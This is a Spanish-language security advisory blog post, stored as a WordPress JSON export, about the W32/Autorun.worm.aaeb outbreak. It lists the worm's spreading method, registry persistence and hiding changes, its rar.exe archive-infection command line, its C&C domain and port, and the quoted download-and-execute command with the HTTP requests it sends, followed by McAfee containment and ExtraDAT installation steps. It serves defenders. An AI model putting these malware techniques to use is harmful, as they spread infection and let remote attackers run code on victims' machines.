{"id":523,"date":"2012-11-29T12:34:07","date_gmt":"2012-11-29T11:34:07","guid":{"rendered":"http:\/\/www.satinfo.es\/noticies\/?p=523"},"modified":"2012-11-29T12:35:01","modified_gmt":"2012-11-29T11:35:01","slug":"mcafee-avisa-de-un-brote-de-nuevas-variantes-del-gusano-w32autorun-worm-aaeb","status":"publish","type":"post","link":"https:\/\/www.satinfo.es\/noticies\/2012\/mcafee-avisa-de-un-brote-de-nuevas-variantes-del-gusano-w32autorun-worm-aaeb\/","title":{"rendered":"McAfee avisa de un brote de nuevas variantes del gusano W32\/Autorun.worm.aaeb"},"content":{"rendered":"<p style=\"text-align: left;\" align=\"CENTER\"><span style=\"font-family: Arial, sans-serif; font-size: small;\">El gusano W32\/Autorun.worm.aaeb tiene la habilidad de infectar dispositivos extra\u00edbles as\u00ed como unidades de red montadas.<\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">La infecci\u00f3n puede iniciarse por una ejecuci\u00f3n manual del archivo infectado o, simplemente, por navegar en cualquier carpeta que contenga los archivos infectados en la que el archivo \u201cAutorun.inf\u201d pueda causar la ejecuci\u00f3n autom\u00e1tica del malware.<\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">Adem\u00e1s es capaz de a\u00f1adir una copia del propio malware en archivos Zip y Rar. <\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">Tambi\u00e9n tiene la posibilidad de descargar otros archivos malware y actualizarse de forma remota v\u00eda un servidor C&amp;C.<\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong><em><span style=\"text-decoration: underline;\">NOTA<\/span><\/em><em>:<\/em> <\/strong>De momento este malware ha sido detectado \u00fanicamente en EEUU y en Am\u00e9rica del Sur por lo que, <span style=\"text-decoration: underline;\">por el momento<\/span>, no se considera como de alta peligrosidad en nuestro pa\u00eds.<\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #ff0000;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: large;\"><strong><span style=\"text-decoration: underline;\">M\u00e9todo<\/span><span style=\"text-decoration: underline;\"> de infecci\u00f3n y de propagaci\u00f3n<\/span>:<\/strong><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">Se propaga creando copias de s\u00ed mismo en dispositivos de almacenamiento y en unidades de red montadas.<\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">Genera un archivo \u201cautorun.inf\u201d para permitir su ejecuci\u00f3n de forma autom\u00e1tica cuando cualquier sistema con la funci\u00f3n autorun habilitada se conecta a la unidad infectada.<\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">Modifica los atributos de los directorios de la unidad afectada para crear copias de s\u00ed mismo con el mismo nombre de fichero como carpeta y ocultarlas.<\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">Tambi\u00e9n busca archivos en las unidades extra\u00edbles con las extensiones indicadas a continuaci\u00f3n y modifica sus atributos para ocultarlos y crear copias de s\u00ed mismo como archivo oculto:<\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong>mp3, avi, wma, wmv, wav, mpg, mp4, doc, txt, pdf, xls, jpg, jpe, bmp, gif, tif, png<\/strong><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">Se asegura de mantener los ficheros con atributos de oculto manteniendo el valor del registro de sistema ShowSuperHidden a \u201c0\u201d.<\/span><\/span><\/span><\/p>\n<ul>\n<li>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced<\/strong><\/span><\/span><\/span><\/p>\n<\/li>\n<\/ul>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong> ShowSuperHidden = dword:00000000<\/strong><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">El malware crea copias de s\u00ed mismo con los siguientes nombre de archivo:<\/span><\/span><\/span><\/p>\n<ul>\n<li>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong>Secret.exe<\/strong><\/span><\/span><\/span><\/p>\n<\/li>\n<li>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong>Sexy.exe<\/strong><\/span><\/span><\/span><\/p>\n<\/li>\n<li>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong>Porn.exe<\/strong><\/span><\/span><\/span><\/p>\n<\/li>\n<li>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong>Passwords. Exe<\/strong><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\">\n<\/li>\n<\/ul>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">De esta forma los usuarios pueden acabar abriendo el archivo v\u00edrico sin ser conscientes de ello.<\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">Tambi\u00e9n genera un archivo de 0 bytes en el dispositivo extra\u00edble llamado <strong>x.mpeg<\/strong><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">Adem\u00e1s a\u00f1ade una copia de s\u00ed mismo en cualquier archivo ZIP o RAR que encuentre en el sistema: verifica la existencia de WinRar en el equipo para utilizar la linea de comandos de \u201crar.exe\u201d y a\u00f1adir la copia del malware en el archivo zip o rar encontrado. <\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">Ejecuta Rar.exe con los siguientes par\u00e1metros:<\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong>Rar.exe a -y -ep -IBCK \u00ab&lt;archivo rar\/zip encontrado&gt;\u00bb \u00ab%userprofile%\\Secret.exe\u00bb<\/strong><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">El archivo de malware que se a\u00f1ade a los archivos afectados se llamar\u00e1 <strong>Secret.exe<\/strong>.<\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">Los otros nombres de detecci\u00f3n conocidos para este malware son:<\/span><\/span><\/span><\/p>\n<ul>\n<li>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">W32\/Autorun.worm.aaec<\/span><\/span><\/span><\/p>\n<\/li>\n<li>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">W32\/Autorun.worm.aaed<\/span><\/span><\/span><\/p>\n<\/li>\n<li>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">W32\/Autorun.worm.aaee<\/span><\/span><\/span><\/p>\n<\/li>\n<li>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">W32\/Autorun.worm.aaef<\/span><\/span><\/span><\/p>\n<\/li>\n<li>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">W32\/Autorun.worm.aaeg<\/span><\/span><\/span><\/p>\n<\/li>\n<li>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">W32\/Autorun.worm.aaeh<\/span><\/span><\/span><\/p>\n<\/li>\n<li>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">VBObfus.ey<\/span><\/span><\/span><\/p>\n<\/li>\n<li>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">VBObfus.ez<\/span><\/span><\/span><\/p>\n<\/li>\n<li>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">VBObfus.fa<\/span><\/span><\/span><\/p>\n<\/li>\n<\/ul>\n<p align=\"LEFT\"><span style=\"color: #b84700;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong><span style=\"text-decoration: underline;\">Consejos de contenci\u00f3n del malware<\/span>:<\/strong><\/span><\/span><\/span><\/p>\n<ul>\n<li>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">D<\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">e<\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">s<\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">habilite la funci\u00f3n <\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">Autorun <\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">e<\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">n Windows <\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">localmente con nuestra utilidad EliPen o mediante GPO de Windows.<\/span><\/span><\/span><\/p>\n<\/li>\n<li>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">Restri<\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">nja el acceso a unidades USB en equipos cr\u00edticos y en servidores<\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">mediante GPO o con el software Device Control de McAfee.<\/span><\/span><\/span><\/p>\n<\/li>\n<li>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">Implement<\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">e<\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">y realice pruebas con las directivas de protecci\u00f3n de acceso de <\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">VirusScan Enterprise <\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">para bloquear la creaci\u00f3n de archivos <\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">AUTORUN.INF.<\/span><\/span><\/span><\/p>\n<\/li>\n<\/ul>\n<p align=\"LEFT\"><span style=\"color: #ff0000;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: large;\"><strong><span style=\"text-decoration: underline;\">C<\/span><span style=\"text-decoration: underline;\">aracter\u00edsticas y s\u00edntomas<\/span>:<\/strong><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><span style=\"color: #b84700;\"><span style=\"text-decoration: underline;\"><strong>Descrip<\/strong><\/span><\/span><span style=\"color: #b84700;\"><span style=\"text-decoration: underline;\"><strong>ci\u00f3n<\/strong><\/span><\/span>:<\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">Tras su ejecuci\u00f3n el malware crea copias de s\u00ed mismo en <strong>%UserProfile%\\[<\/strong><strong>aleatorio<\/strong><strong>].exe<\/strong><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">Se conecta al dominio Ns1.helpupdater.net mediante el puerto TCP 9004 para descargar comandos remotos<\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">El servidor C&amp;C env\u00eda autom\u00e1ticamente comandos al equipo infectado una vez establecida la comunicaci\u00f3n por el puerto 9004. El comando enviado provoca que el equipo infectado descargue y ejecute un archivo desde la URL que se le indique.<\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">El comando enviado por el servidor C&amp;C es el siguiente:<\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong>:.dl http:\/\/&lt;6 d\u00edgitos aleatorios&gt;.zdns.eu:443\/QJvDPNrUwp?f google.com<\/strong><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">Una vez que el malware recibe este comando intentar\u00e1 descargar y ejecutar el archivo descargado.<\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">Las peticiones http GET enviadas por el malware durante la descarga del archivo maliciosos especificado por el servidor C&amp;C son las siguientes:<\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong>GET \/zRDxrG\/?f HTTP\/1.1<\/strong><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong>User-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)<\/strong><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong>Host: &lt;6 d\u00edgitos aleatorios&gt;.zdns.eu<\/strong><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong>Connection: Keep-Alive<\/strong><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">El malware deshabilita tambi\u00e9n la funci\u00f3n de Windows Update cambiando el valor de registro <strong>NoAutoUpdate<\/strong> a 1:<\/span><\/span><\/span><\/p>\n<ul>\n<li>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong>HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU<\/strong><\/span><\/span><\/span><\/p>\n<\/li>\n<\/ul>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong> NoAutoUpdate = dword:00000001<\/strong><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #b84700;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong><span style=\"text-decoration: underline;\">Contenci\u00f3n del brote<\/span>:<\/strong><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">Se recomienda a los usuarios que hagan cuidado a la hora de abrir correos no solicitados con archivos adjuntos sospechosos.<\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">Es muy importante mantener actualizado el sistema operativo mediante Windows Update as\u00ed como tener actualizados los parches de cualquier software de terceros, actualizar regularmente las definiciones de virus y crear unas reglas de filtrado apropiadas:<\/span><\/span><\/span><\/p>\n<ul>\n<li>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">A ser posible bloquear el acceso al puerto especificado y monitorizar y bloquear el acceso a las URLs indicadas<\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">.<\/span><\/span><\/span><\/p>\n<\/li>\n<li>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">Crea<\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">r<\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">reglas de protecci\u00f3n de acceso para bloquear la creaci\u00f3n de archivos en la carpeta anteriormente indicada.<\/span><\/span><\/span><\/p>\n<\/li>\n<li>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">La Protecci\u00f3n de Acceso debe estar ACTIVADA y se deben definir reglas apropiadas para poder descubrir qu\u00e9 procesos son responsables de modificar los atributos de archivos y carpetas.<\/span><\/span><\/span><\/p>\n<\/li>\n<\/ul>\n<p align=\"LEFT\"><span style=\"color: #ff0000;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: large;\"><strong><span style=\"text-decoration: underline;\">Mecanismo de reinicio<\/span>:<\/strong><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><strong style=\"font-size: small; font-family: Arial, sans-serif; color: #b84700;\"><span style=\"text-decoration: underline;\">Descripci\u00f3n<\/span>:<\/strong><\/p>\n<p align=\"LEFT\"><span style=\"font-size: small; font-family: Arial, sans-serif;\">La clave de registro especificada a continuaci\u00f3n permite que el troyano se ejecute autom\u00e1ticamente cada vez que Windows se inicie:<\/span><\/p>\n<ul>\n<li>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run<\/strong><\/span><\/span><\/span><\/p>\n<\/li>\n<\/ul>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong> &lt;nombre del malware&gt; =\u201d %UserProfile%\\&lt;Nombre aleatorio&gt;.exe \/e<\/strong><\/span><\/span><\/span><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"color: #008000;\"><span style=\"font-size: large;\"><strong><span style=\"text-decoration: underline;\">Soluci\u00f3n<\/span>:<\/strong><\/span><\/span><\/p>\n<p>A la espera de a\u00f1adir la detecci\u00f3n de este malware y sus variantes al archivo DAT diario, McAfee ha generado un archivo Extra.dat para poder controlar todos los nombres de detecci\u00f3n indicados anteriormente.<\/p>\n<p>Para poder realizar la instalaci\u00f3n de este archivo Extra.dat pueden seguir el m\u00e9todo que m\u00e1s les convenga.<\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"color: #b84700;\"><span style=\"text-decoration: underline;\"><strong>Instalaci\u00f3n del archivo extra.dat <\/strong><\/span><\/span><span style=\"color: #b84700;\"><span style=\"text-decoration: underline;\"><strong>en equipos sin gestionar por ePO<\/strong><\/span><\/span><strong>:<\/strong><\/p>\n<p><span><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">Haga clic en <\/span><\/span><\/span><span><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong>Inicio<\/strong><\/span><\/span><\/span><span><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">, <\/span><\/span><\/span><span><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong>Ejecutar<\/strong><\/span><\/span><\/span><span><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">, escriba <\/span><\/span><\/span><strong><span><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">services.msc<\/span><\/span><\/span><\/strong><strong><\/strong><strong><span><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">y haga clic en <\/span><\/span><\/span><\/strong><span><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong>OK<\/strong><\/span><\/span><\/span><span><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">.<\/span><\/span><\/span><\/p>\n<ul>\n<li><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">Haga clic con el bot\u00f3n derecho sobre el servicio <\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong>McAfee McShield <\/strong><\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">y seleccione la opci\u00f3n<\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong> Detener<\/strong><\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">.<\/span><\/span><\/span><\/li>\n<li>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">Cop<\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">ie el archivo <\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">ExtraDAT <\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">ya descomprimido a la ruta siguiente:<\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">&#8211; Equipos de <\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">32 bit<\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">s:<\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><br \/>\n<\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong>C:<\/strong><\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong>\\<\/strong><\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong>Archivos de Programa<\/strong><\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong>\\<\/strong><\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong>Archivos Comunes<\/strong><\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong>\\McAfee\\Engine<br \/>\n<\/strong><\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><br \/>\n<\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">&#8211; Equipos de <\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">64 bit<\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">s:<\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><br \/>\n<\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong>C:<\/strong><\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong>\\<\/strong><\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong>Archivos de Programa (x86)<\/strong><\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong>\\<\/strong><\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong>Archivos Comunes<\/strong><\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong>\\McAfee\\Engine<\/strong><\/span><\/span><\/span><\/p>\n<\/li>\n<li>\n<p align=\"LEFT\"><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">En la consola de servicio haga clic con el bot\u00f3n derecho sobre el servicio <\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong>McAfee McShield <\/strong><\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">y seleccione la opci\u00f3n <\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong>Iniciar<\/strong><\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">.<\/span><\/span><\/span><\/p>\n<p><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">Las detecciones incluidas en el archivo <\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">ExtraDAT <\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">tendr\u00e1n efecto una vez que el servicio <\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">McShield <\/span><\/span><\/span><span style=\"color: #333333;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">se haya iniciado.<\/span><\/span><\/span><\/li>\n<\/ul>\n<p><span style=\"color: #b84700;\"><span style=\"text-decoration: underline;\"><strong>Instalaci\u00f3n del archivo extra.dat <\/strong><\/span><\/span><span style=\"color: #b84700;\"><span style=\"text-decoration: underline;\"><strong>mediante la consola ePO<\/strong><\/span><\/span><strong>:<\/strong><\/p>\n<ul>\n<li>A\u00f1ada el archivo extra.dat (ya descomprimido) al repositorio de ePO utilizando la opci\u00f3n <span style=\"color: #4d4c4a;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><strong>Archivo DAT adicional (.DAT)<\/strong><\/span><\/span><\/span><\/li>\n<li><span style=\"color: #4d4c4a;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\">Cree una nueva tarea de actualizaci\u00f3n seleccionado \u00fanicamente el archivo extraDAT a\u00f1adido (aparece normalmente con el nombre <\/span><\/span><\/span><span style=\"color: #4d4c4a;\"><span style=\"font-family: Arial, sans-serif;\"><span style=\"font-size: small;\"><em><strong>ExtraDAT (M4;W32.Autorun.worm.aaeh)<\/strong><\/em><\/span><\/span><\/span><span style=\"color: 